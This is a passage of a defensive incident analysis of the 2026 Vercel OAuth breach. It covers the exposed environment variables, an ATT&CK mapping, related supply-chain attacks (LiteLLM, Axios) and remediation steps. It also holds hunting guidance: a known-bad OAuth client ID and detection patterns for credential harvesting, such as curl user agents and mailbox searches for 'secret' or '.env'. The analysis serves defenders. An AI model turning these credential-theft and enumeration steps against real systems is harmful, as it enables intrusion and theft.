        <w:t>Customers: Organizations whose credentials may have been exposed cannot assume the exposure window ended on April 19. It may have begun being actively exploited well before.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From an incident-response planning perspective, this data point also validates a practical point: unsolicited leaked-credential notifications from providers, such as OpenAI, Anthropic, GitHub, AWS, Stripe, and the likes, are now a primary early-warning channel for platform breaches. Security teams should treat them as high-priority signals, not routine noise.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AI-accelerated tradecraft (CEO Assessment)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his April 19 thread on X, Vercel CEO Guillermo Rauch explicitly stated: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 believe the attacking group to be highly sophisticated and, I strongly suspect, significantly accelerated by AI. They moved with surprising velocity and in-depth understanding of Vercel."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is a noteworthy on-record claim from a CEO of an affected platform and should be evaluated carefully. Attribution based on "velocity" is inherently interpretive, but it warrants attention for several reasons which we discuss in this section.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"AI-accelerated" could plausibly look like in evidence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If Rauch's assessment reflects something real rather than post-hoc rationalization, the underlying forensic signals would likely include one or more of the following: Enumeration speed that exceeds manual pace. Scripting alone accounts for some of this, but LLM-driven reconnaissance can parallelize schema discovery, endpoint probing, and credential format recognition faster than manual query construction.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Contextual query construction. Queries that appear aware of Vercel-specific terminology (project slugs, deployment target names, env var naming conventions) without obvious prior reconnaissance.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Adaptive behavior in response to errors. LLM-assisted attackers tend to recover from API errors and rate-limits more fluently than static scripts, shifting strategy on the fly.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Prompt-engineered social artifacts. Phishing lures, commit messages, or support tickets that read as locally authentic rather than translated or templated.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Why this matters beyond the Vercel incident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Regardless of whether Rauch's assessment holds up to formal forensic review, the category itself-AI-augmented adversary operations-is no longer simply speculative. Microsoft's April 2026 publication on AI-enabled device- code phishing (Storm-2372 successor campaigns) documented live threat actors using generative AI for dynamic code generation, hyper-personalized lures, and backend automation orchestration. The implication is that telemetry baselines calibrated against human-paced attacker behavior may generate false negatives against AI-accelerated operators.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Detection-engineering implication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If AI-accelerated attackers compress the timeline of enumeration and lateral movement, detection rules tuned on dwell-time and velocity thresholds from older incident data may under-alert. In particular, teams should consider revisiting thresholds on: unique-resource enumeration rate per session, error-to-success ratio recovery curves, and diversity of query patterns within a short window.</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environment variable design problem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most consequential aspect of this breach is not the initial access vector - OAuth compromises are a known and studied risk. It is Vercel's environment variable sensitivity model, which created a default-insecure configuration for customer secrets.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4. The environment variable design problem, comparing default- insecure secrets-manager models with secure-by-default approaches.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How Vercel environment variables worked at the time of the breach</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Vercel projects use environment variables to inject configuration and secrets into serverless functions and build processes. These variables have a "sensitive" flag that controls access restrictions, as seen in Table 2.</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Property Default (Non-sensitive) Sensitive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Default state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 (all new vars)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Must be explicitly enabled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Visible in dashboard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Yes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Masked after creation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Accessible via internal APIs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Yes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Restricted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Encrypted at rest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 (according to Rauch)</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Yes, with additional restrictions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Accessible to attacker in this breach</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Yes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Appears not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2. Comparison of Vercel environment variable handling based on sensitivity flag.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critical design choice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sensitive flag is off by default. Every DATABASE_URL, API_KEY, STRIPE_SECRET_KEY, or AWS_SECRET_ACCESS_KEY added by a developer who did not explicitly toggle this flag was stored unencrypted at rest in Vercel's internal access model.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Any security control that requires explicit opt-in for every individual secret, with no guardrails or defaults, will have a low adoption rate in practice.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Vercel's response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Rauch confirmed that Vercel has already rolled out dashboard changes: an overview page for environment variables and an improved UI for sensitive variable creation and management. These changes improve discoverability, but as of this writing do not change the default - developers must still opt in per variable. Whether Vercel will flip the default remains an open question that customers should press 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Comparison to industry peers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industry trend is toward purpose-built secret storage, such as Vault, AWS Secrets Manager, Doppler, and Infisical, rather than environment variable stores with sensitivity tiers. This breach validates that architectural choice.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3 summarizes how Vercel's environment variable based approach compares to common practices among similar platforms.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Platform Default secret handling Auto-detection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Vercel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Non-sensitive by default; manual flag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AWS SSM Parameter Store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Supports SecureString type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 (but distinct API)</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HashiCorp Vault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All secrets encrypted with ACL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N/A (purpose-built)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GitHub Actions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All secrets masked in logs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 (but separate secrets UI)</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Netlify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Environment variables with secret toggle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3. Comparison of Vercel's environment variable-based secret handling with industry peer platforms that employ dedicated secret management systems.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Credential fan-Out: Quantifying downstream risk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term "credential fan-out" describes how a single platform breach cascades into exposure across every downstream service authenticated by credentials stored on that platform.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5. Illustration of credential fan-out and how one platform breach can turn into many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this particular case, we summarize in Table 4 what Vercel project environment variables may typically include and their downstream impact.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Category Example variables Downstream impact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Database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DATABASE_URL, POSTGRES_PASSWORD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Full data access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Cloud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AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY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Cloud account compromise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Payment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STRIPE_SECRET_KEY, STRIPE_WEBHOOK_SECRET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Financial data, refund fraud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Auth</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AUTH0_SECRET, NEXTAUTH_SECRET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Session forgery, account takeover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Email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SENDGRID_API_KEY, POSTMARK_TOKEN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Phishing from trusted domains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Monitoring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DATADOG_API_KEY, SENTRY_DSN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Telemetry manipulation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Source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GITHUB_TOKEN, NPM_TOKEN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Supply chain injection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AI/ML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OPENAI_API_KEY, ANTHROPIC_API_KEY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API abuse, cost generation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4. Environment variables commonly stored in Vercel projects and the potential downstream impact if exposed.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single Vercel project commonly contains 10 to 30 environment variables. At an organization scale, a portfolio of 50 projects could have 500 to 1,500 credentials within the platform. Each credential is a potential pivot point into an entirely separate system with its own blast radius.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is the multiplier that elevates a platform breach from a confidentiality event into a potential cascade across the software supply chain.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Why OAuth trust relationships bypass perimeter defenses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fundamental reason this attack succeeded for approximately 22 months is that OAuth-based intrusion bypasses most of the controls that would catch a traditional credential-based attack.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Every defensive control in the left column is something security teams rely on to detect or block account compromise. Every one of those controls is either irrelevant or already satisfied in the OAuth-app compromise path. This asymmetry is the reason OAuth governance is emerging as a distinct security discipline, separate from identity and access management.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6. Comparison of traditional credential based attack paths and OAuth application compromise, illustrating how OAuth trust relationships bypass perimeter security controls and enable silent lateral movement.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OAuth governance as a vendor-risk function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organizations treat OAuth grants as a developer self-service problem: each employee authorizes the tools they need, with minimal central review. This incident argues OAuth grants should be treated as third-party risk management - every authorized OAuth app is effectively a vendor with persistent access to corporate data, and should be vendor-reviewed, periodically re-authorized, and monitored for anomalous use.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Threat actor claims and attribution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Threat actor claims on underground forums are inherently unreliable. The following is documented for awareness and threat tracking, not as confirmed fact. Attribution in breach scenarios is notoriously difficult, and forum claims are frequently exaggerated, fabricated, or made by parties tangentially related to an incident.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ShinyHunters-affiliated claims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threat actor claiming affiliation with the ShinyHunters group posted on BreachForums alleging possession of Vercel data.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Claimed data Quantity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Employee records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~580</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Source code repositories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Not specified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API keys and internal tokens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Not specified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GitHub and NPM tokens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Not specified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Internal communications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Not specified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Linear workspace access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Not specified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Table 5. Summary of claimed data and their quantity, all of which remain unverified.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Several factors complicate attribution of the incident to the actor claiming ShinyHunters affiliation: Known ShinyHunters members have publicly denied involvement to BleepingComputer.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>A $2M ransom demand was allegedly communicated via Telegram - a common monetization pattern for both legitimate and fabricated breach claims. The ShinyHunters brand has been used by multiple, potentially unrelated actors since the group's original campaigns.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Vercel's security bulletin does not reference these claims; Rauch's thread addresses the attack chain but not the forum posting directly.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Supply chain release path: Vercel's position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Rauch directly addressed the highest-impact scenario stating that "We've analyzed our supply chain, ensuring Next.js, Turbopack, and our many open source projects remain safe for our community."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Independent verification of release-path integrity is ongoing at the time of writing. Organizations using Next.js, Turbopack, or other Vercel open source projects should continue to monitor package integrity signals (checksums, signing, provenance attestations) as standard practice.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Without independent verification of the forum-claimed data, those claims should be treated as unconfirmed. The OAuth-based attack chain described by Vercel is technically sound and does not require the scope of access claimed by the forum poster, suggesting the claims may be exaggerated, may represent a separate unrelated incident, or may be fabricated.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MITRE ATT&amp;CK Mapping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confirmed attack chain maps cleanly to established MITRE ATT&amp;CK techniques, as summarized in Table 6. The mapping reflects behaviors explicitly described in Vercel's disclosure and aligns with well-understood OAuth abuse patterns rather than novel exploitation.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Tactic Technique ID Application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Initial Access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Trusted Relationship</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T1199</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Context.ai OAuth app as trusted third party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Persistence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Application Access Token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T1550.001</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OAuth token survives password rotation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Credential Access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Valid Accounts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T1078</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Compromised employee Workspace credentials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Discovery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Account Discovery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T1087</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Internal system and project enumeration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Credential Access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Unsecured Credentials: Credentials in Files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T1552.001</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Non-sensitive env vars accessible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Lateral Movement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Valid Accounts: Cloud Accounts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T1078.004</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Potential use of exposed cloud credentials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Collection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Data from Information Repositories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T1213</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Env var enumeration across projects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6. MITRE ATT&amp;CK technique mapping for the Vercel incident.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Based on this mapping, the pivot from OAuth application access to internal system access (T1199 to T1078) is the highest-value detection point.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Organizations should therefore monitor for anomalous OAuth application behavior, particularly applications accessing resources outside their expected scope or from unexpected IP ranges.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supply chain siege: LiteLLM, Axios and a converged pattern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Vercel breach did not occur in isolation. The period from March to April 2026 has seen an unprecedented concentration of software supply chain attacks, suggesting either coordinated campaign activity or-more likely- convergent discovery by multiple threat actors of the same structural weakness: the trust boundaries between package registries, CI/CD systems, OAuth providers, and deployment platforms.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Figure 7. Convergence of three distinct supply-chain attack vectors on a single target: developer-stored credentials and secrets.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March 24, 2026: LiteLLM PyPI supply chain compromise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Malicious PyPI packages litellm versions 1.82.7 and 1.82.8 were published using stolen CI/CD publishing credentials from Trivy (Aqua Security's vulnerability scanner). The attack targeted LiteLLM, a widely-used LLM proxy with ~3.4 million daily downloads.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Initial access: Attacker (tracked as "TeamPCP") compromised Trivy's CI/CD pipeline credentials, which had PyPI publishing permissions.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Payload: Three-stage backdoor targeting 50+ credential types across major cloud providers, with Kubernetes DaemonSet persistence for lateral movement. Dwell time: Malicious packages were live for approximately 40 minutes to 3 hours before detection and removal.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>CVE involved: CVE-2026-33634.</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March 31, 2026: Axios npm supply chain compromise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npm package axios (70-100 million weekly downloads) was compromised via maintainer account hijacking. Malicious versions 1.14.1 and 0.30.4 injected a dependency on plain-crypto-js@4.2.1, which contained a cross-platform Remote Access Trojan (RAT).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Initial access: Maintainer account hijacked (mechanism not disclosed; credential stuffing or phishing suspected).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Scale: 135 endpoints detected contacting attacker command-and-control infrastructure.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Dwell time: 2-3 hours before detection.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Attribution: Microsoft attributed the attack to Sapphire Sleet, a North Korean state-sponsored threat actor.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convergence pattern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Three attacks in three weeks. Three different vectors. The same target: the credentials and secrets that developers store in their toolchains.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Incident Date Vector Target asset Dwell time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LiteLLM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Mar 24, 2026</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CI/CD credential theft -&gt; PyPI</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Developer credentials, API keys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40 min - 3 hrs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Axios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Mar 31, 2026</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Maintainer account hijack -&gt; npm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Developer workstations (RAT)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2-3 hrs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Vercel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Apr 19, 2026</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OAuth app compromise -&gt; platform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Customer env vars (credentials)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~22 months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7. Summary of recent supply chain adjacent incidents targeting developer credentials and secret storage layers.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previous platform breaches reveal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Vercel breach follows a well-documented pattern of platform-level compromises that expose customer secrets at scale.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Codecov bash uploader breach (January - April 2021)</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happened: Attackers modified Codecov's Bash Uploader script (used in CI/CD pipelines) to exfiltrate environment variables from customers' CI environments. The compromise went undetected for approximately two months. 29,000+ customers potentially affected, including Twitch, HashiCorp, and Confluent.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Parallel to Vercel: Both incidents expose customer credentials stored as environment variables through a platform compromise.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CircleCI security incident (January 2023)</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happened: An attacker stole an employee's SSO session token via malware on a personal device, used it to access internal CircleCI systems, and exfiltrated customer secrets and encryption keys. CircleCI recommended all customers rotate every secret stored on the platform.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Parallel to Vercel: Nearly identical pattern - employee account compromise - &gt; internal system access -&gt; customer secret exfiltration.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Snowflake customer credential attacks (May-June 2024)</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Threat actor UNC5537 used credentials obtained from infostealer malware to access Snowflake customer accounts that lacked MFA. Over 165 organizations affected, including Ticketmaster, Santander Bank, and AT&amp;T.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Okta support system breach (October 2023)</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Attackers accessed Okta's customer support case management system using stolen credentials, viewing HAR files that contained session tokens for Okta customers including Cloudflare, 1Password, and BeyondTrust.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Pattern summary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pattern is clear. Platform-level access to customer secrets is a systemic risk that has been exploited repeatedly across CI/CD, identity, data warehouse, and deployment platforms. Each incident follows the same arc: initial access through a trust relationship or credential, lateral movement to internal systems, and exfiltration of customer secrets at scale.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Incident Year Initial vector Customer asset exposed Detection lag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Codecov</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2021</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Supply chain (script modification)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CI env vars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 months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Okta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2023</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Stolen support credentials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Session tokens (HAR files)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Weeks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CircleCI</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2023</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SSO session token theft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Secrets + encryption keys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Weeks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Snowflake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2024</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Infostealer credentials (no MFA)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Customer data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Months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Vercel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2024-2026</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OAuth app compromise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Deployment env vars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~22 months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8. Pattern of recent platform level breaches illustrating repeated exposure of customer secrets following trust based initial access and prolonged detection latency.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remains unknown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Despite the volume of public reporting, executive statements, and third party commentary surrounding this incident, material gaps remain in the public record. A rigorous analysis requires not only examining what is known but explicitly acknowledging what has not been disclosed or independently verified.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following unresolved questions represent significant gaps in publicly available information that are directly relevant to understanding the root cause, scope, and impact of this incident: How Context.ai was compromised. The root cause of the OAuth application compromise has not been disclosed. Rauch's statement that Vercel has "reached out to Context to assist" suggests the scope may still be unclear to Context.ai itself.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>When Vercel first detected anomalous activity. The April 10 OpenAI notification received by a Vercel customer raises this question sharply. Vercel has not published an internal-detection timeline.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Why the nine-day gap between the earliest public evidence of credential abuse and Vercel's disclosure. Multiple explanations are plausible (coordinated disclosure, ongoing investigation, customer notifications in progress); the public record does not resolve which applies.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Number of affected customers. Rauch described the impact as "quite limited"; a specific count has not been disclosed.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Whether the ShinyHunters forum claims represent the same attacker. Whether the claims match the confirmed attack chain or a separate incident remains unverified.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Context.ai's current status and downstream-customer notifications. Whether Context.ai has published its own incident report or notified other customers is unknown.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Full scope of internal access. Beyond environment variables, what other internal Vercel systems or data the attacker accessed during the 22-month dwell time.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Detection and hunting guidance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section provides practical detection and hunting guidance for organizations potentially affected by the incident.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Vercel customers (Immediate)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 Audit all environment variables by entering the following code in Vercel projects to verify the configuration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List all env vars across all Vercel projects via CLI vercel env ls --environment production vercel env ls --environment preview vercel env ls --environment development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Check which variables are NOT marked as sensitive # (Vercel CLI does not currently expose the sensitive flag - # check via dashboard or API)</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2. Search for unauthorized usage of exposed credentials Query cloud provider CloudTrail/audit logs for API calls using exposed access keys from unexpected IP ranges or user agents.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>AWS CloudTrail: Filter on eventSource containing sts.amazonaws.com, iam.amazonaws.com, s3.amazonaws.com. Search for userIdentity.accessKeyId matching any rotated Vercel-stored access key. Flag any sourceIPAddress outside your known CIDR ranges or any userAgent containing python-requests, curl, Go-http-client, or unfamiliar automation strings. Time window: June 2024 - present.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>GCP Audit Logs: Query protoPayload.authenticationInfo.principalEmail for service accounts whose keys were stored in Vercel. Filter protoPayload.requestMetadata.callerIp against your known ranges. Look for protoPayload.methodName containing storage.objects.get, compute.instances.list, or iam.serviceAccountKeys.create from unexpected sources.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Azure Activity Logs: Filter on caller matching any application ID or service principal whose credentials were in Vercel env vars. Flag callerIpAddress outside expected ranges. Priority queries: Microsoft.Storage/storageAccounts/listKeys, Microsoft.Compute/virtualMachines/write, Microsoft.Authorization/roleAssignments/write.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Database access logs: For every database whose connection string was stored as a Vercel environment variable, query connection logs for the full exposure window (June 2024 - April 2026). Search for connections originating from IPs outside your application's known egress ranges (Vercel edge IPs, your VPN, your office). Flag connections using the exposed credentials that occurred outside normal deployment windows. For PostgreSQL: query pg_stat_activity and log_connections logs. For MySQL: query the general log or audit plugin. For MongoDB Atlas: query the Project Activity Feed for DATA_EXPLORER and CONNECT events from unknown IPs. Payment processors: For Stripe, check the Dashboard -&gt; Developers -&gt; Logs for API calls using the exposed key. Filter for source_ip outside your servers. Look for /v1/charges, /v1/transfers, /v1/payouts, and /v1/customers calls you don't recognize. For Braintree/Adyen, query the equivalent API transaction logs. Priority: any api_key that was stored in Vercel as a non-sensitive env var and has not yet been rotated. Audit email sending service logs for unexpected sends.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Check for unsolicited leaked-credential notifications from OpenAI, Anthropic, GitHub, AWS, Stripe, and similar providers during the exposure window. These automated detection systems are now a primary early-warning channel for this class of breach.</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 Rotate AND redeploy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critical operational detail to note is that a rotating Vercel environment variable does not retroactively invalidate old deployments. According to Vercel's documentation, prior deployments continue using the old credential value until they are redeployed.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Rotation without redeploy leaves the compromised credential live in any previous deployment artifact that is still reachable. Every credential rotation must be followed by a redeploy of every environment that used that variable, or the old deployments must be explicitly disabled.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Priority order for rotation: Cloud provider credentials (AWS, GCP, Azure).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Database connection strings.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Payment processor keys.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Authentication secrets (JWT secrets, session keys).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Third-party API keys.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Monitoring and logging tokens.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security teams (Proactive)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OAuth application audit - Google Workspace Admin Console -&gt; Security -&gt; API Controls -&gt; Third-party app access. Review all authorized OAuth applications.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Flag applications with broad scopes (Drive, Gmail, Calendar).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Investigate applications from vendors without active business relationships. Monitor for OAuth token usage from unexpected IP ranges.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Search for the known-bad OAuth Client ID: 110671459871- 30f1spbu0hptbs60cb4vsmv79i7bbvqj.apps.googleusercontent.com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Detection Logic for SIEM Implementation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following detection patterns map to the confirmed attack chain stages. Each pattern describes the observable behavior, the log source to instrument, and the conditions that should trigger investigation.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Organizations should translate these into rules native to their SIEM platform (Sigma, Splunk SPL, KQL, Chronicle YARA-L) after validating field names against their specific log source schemas.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OAuth application anomalies (Stages 1-2)</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Monitor Google Workspace token and admin audit logs for three patterns. First, any token refresh or authorization event associated with the known- bad OAuth Client ID (110671459871- 30f1spbu0hptbs60cb4vsmv79i7bbvqj.apps.googleusercontent.com) should trigger an immediate alert, this is the compromised Context.ai application.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Second, any OAuth application authorization event that grants broad scope (including full mail access, Drive read/write, calendar access) warrants review against your active vendor inventory; applications that are no longer in active business use should be revoked. Third, token usage from any authorized OAuth application where the source </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>IP falls outside your expected corporate and vendor CIDR ranges should be flagged for investigation, as this may indicate token theft or application compromise.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Internal system access and lateral movement (Stage 3, T1078)</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Once attackers control a compromised Google Workspace account, they pivot into internal systems that trust that identity. Detection should focus on four indicators: Anomalous SSO/SAML authentication events. Monitor your identity provider logs for the compromised Workspace account authenticating into internal applications (Vercel dashboard, CI/CD platforms, internal tooling) from unfamiliar IP addresses, geolocations, or device fingerprints - particularly first-time access to systems that account had never previously touched.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Email and Drive credential harvesting. Review Google Workspace audit logs for bulk email search queries (keywords like "API key," "secret," "token," "password," ".env"), unusual Google Drive file access patterns (opening shared credential stores, engineering runbooks, or infrastructure documentation), and mail forwarding rule creation on the compromised account.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>OAuth-connected internal tool access. The compromised Workspace identity likely had existing OAuth grants to internal tools (Slack, Jira, GitHub, internal dashboards). Monitor those downstream services for session creation or API activity tied to the compromised user that occurs outside normal working hours or from infrastructure inconsistent with the user's historical access pattern.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Privilege escalation attempts. Watch for the compromised identity requesting elevated permissions, joining new groups or roles, or accessing admin consoles it had not previously used. In Google Workspace specifically, monitor for Directory API calls, delegation changes, or attempts to enumerate other users' OAuth tokens.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Environment variable enumeration (Stage 4)</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Monitor Vercel team audit logs for unusual patterns of environment variable access. The specific event types will depend on Vercel's audit log schema, but the target behavior is any API call that reads, lists, or decrypts environment variables at a volume or frequency inconsistent with normal deployment activity.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Baseline your normal deployment cadence first - CI/CD pipelines legitimately read environment variables at build time - then alert access patterns that deviate from that baseline in volume, timing, or source identity. Pay particular attention to any environment variable access originating from user accounts rather than service accounts, or from accounts that do not normally interact with the projects being accessed.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Downstream credential abuse (Stage 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every credential that was stored as a non-sensitive Vercel environment variable during the exposure window (June 2024 - April 2026), query the corresponding service's access logs for usage from unexpected sources. In AWS, this means CloudTrail queries filtered on the specific access key IDs, looking for API calls from IP addresses outside your known application, CI/CD, and corporate ranges.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GCP and Azure, the equivalent is audit log queries filtered on the relevant service account or application identity. For SaaS APIs (Stripe, OpenAI, Anthropic, SendGrid, Twilio), check the provider's dashboard or API logs for key usage from unrecognized IPs or during time windows when your application was not active. Any credential showing usage that cannot be attributed to your own infrastructure should be treated as compromised, rotated immediately, and investigated for what actions the attacker performed with it.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Third-Party credential leak notifications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Configure monitoring for unsolicited leaked-credential notifications from providers that operate automated secret 